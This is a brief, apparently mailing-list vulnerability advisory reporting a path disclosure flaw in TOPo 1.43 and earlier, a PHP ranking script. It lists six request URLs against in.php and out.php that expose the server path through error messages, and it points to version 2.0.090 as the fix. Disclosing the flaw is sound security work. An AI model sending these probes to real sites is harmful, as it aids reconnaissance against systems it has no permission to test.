TOPo 1.43 and prior - Path Disclosure (in.php, out.php)

[Rynho Zeros Web <hackargentino () gmx net>]

+ Poduct:
TOPo.

TOPo is a free TOP system written in PHP that works without MySQL database.
TOPo is specially designed for web sites hosted in web servers that not
offer a quality MySQL support.

More
info:
http://ej3scripts.loadedweb.com/modules.php?name=Info_Scripts&file=index&func=topo

+ Web Site:
http://www.eejj33.tk/

+ Version:
1.43 and prior

+ Bug:
TOPo 1.43 and prior - Path Disclosure (in.php, out.php)

+ Exploit:
http://hots/[top_path]/in.php?
http://hots/[top_path]/out.php?
http://hots/[top_path]/in.php?id=any_word
http://hots/[top_path]/out.php?id=any_word
http://hots/[top_path]/in.php?any_word
http://hots/[top_path]/out.php?any_word

The failure takes place when trying to open the file that takes the name of
parameter that we happened to him.  When not being the archives it along with
shows to the error in screen the route to us in the server.

+ Solution:
Install the version 2.0.090 that this free one of this error as his creator
said.

Download Last
Version:
http://ej3scripts.loadedweb.com/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=12&title=EJ3_TOPo_v2.0.090

-- 
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!